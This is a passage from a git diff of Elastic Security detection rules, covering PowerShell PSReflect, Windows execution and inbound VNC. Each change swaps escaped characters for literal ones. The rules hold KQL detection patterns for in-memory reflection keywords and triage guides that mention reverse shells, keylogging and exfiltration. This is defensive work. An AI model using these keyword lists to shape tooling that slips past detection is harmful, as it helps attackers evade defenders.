>\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_108.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_108.json index 6f663470b10..41ba175a01f 100644 --- a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_108.json +++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_108.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell PSReflect Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.path : ?\\:\\\\\\\\ProgramData\\\\\\\\MaaS360\\\\\\\\Cloud?Extender\\\\\\\\AR\\\\\\\\Scripts\\\\\\\\ASModuleCommon.ps1*\n", "references": [ "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_109.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_109.json index 9b95fc330e9..c900673ecab 100644 --- a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_109.json +++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_109.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell PSReflect Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.path : ?\\:\\\\\\\\ProgramData\\\\\\\\MaaS360\\\\\\\\Cloud?Extender\\\\\\\\AR\\\\\\\\Scripts\\\\\\\\ASModuleCommon.ps1*\n", "references": [ "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_1.json b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_1.json index 48b9f4f2db4..fad7394e98a 100644 --- a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_1.json +++ b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_102.json b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_102.json index f8adcf09b6c..c2a55411129 100644 --- a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_102.json +++ b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_102.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_103.json b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_103.json index 43994a5e81a..e7642a6a07e 100644 --- a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_103.json +++ b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_103.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_2.json b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_2.json index a75fc1f2d4c..35451d5759e 100644 --- a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_2.json +++ b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_2.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_101.json b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_101.json index b630f94f7e7..d80e06a7c9e 100644 --- a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_101.json @@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "VNC (Virtual Network Computing) from the Internet", - "query": "event.category:(network or network_traffic) and network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", + "query": "event.category:(network or network_traffic) and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], 